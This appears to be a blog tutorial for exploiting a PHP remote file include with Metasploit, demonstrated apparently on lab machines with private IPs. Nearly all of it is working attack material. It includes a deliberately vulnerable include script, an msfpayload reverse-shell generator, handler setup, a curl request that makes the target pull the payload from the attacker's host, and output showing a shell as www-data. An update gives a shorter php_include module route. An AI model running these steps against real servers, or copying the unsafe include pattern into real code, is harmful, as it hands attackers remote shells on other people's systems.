First off, find yourself a php script with a remote file include. For this example, I created one:
include_test.php:
<html>
<body>
<? require $_GET['include'] ?>
</body>
</html>
Next, generate your php payload for this use:
./msfpayload php/reverse_php LHOST=172.16.119.137 R > /var/www/include.php.txt
This just generates a reverse connect php script. I also had to edit the file and enclose it in tags. Also, you can see that I placed it in my web servers root directory so that it's now publicly accessible.
Next up, start up your metasploit console and handler:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(handler) > set LHOST 172.16.119.137
LHOST => 172.16.119.137
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler on port 4444
Finally, access the url to fire the remote file include:
curl 'http://172.16.119.136/apache2-default/include_test.php?include=http://172.16.119.137/include.php.txt'
And have fun:
[*] Command shell session 1 opened (172.16.119.137:4444 -> 172.16.119.136:32803)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Update: @egyp7 on twitter was awesome enough to point out all of this could be simplified to:
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set PHPURI /apache2-default/include_test.php?include=!URL!
PHPURI => /apache2-default/include_test.php?include=!URL!
msf exploit(php_include) > set RHOST 172.16.119.136
RHOST => 172.16.119.136
msf exploit(php_include) > set LHOST 172.16.119.137
LHOST => 172.16.119.137
msf exploit(php_include) > exploit
[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/siI1CLOjhRpr0DS
[*] Local IP: http://172.16.119.137:8080/siI1CLOjhRpr0DS
[*] PHP include server started.
[*] Trying uri /apache2-default/include_test.php?include=%68%74%74%70%3a%2f%2f%31%37%32%2e%31%36%2e%31%31%39%2e%31%33%37%3a%38%30%38%30%2f%73%69%49%31%43%4c%4f%6a%68%52%70%72%30%44%53%3f
[*] Command shell session 1 opened (172.16.119.137:4444 -> 172.16.119.136:32823)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
No comments:
Post a Comment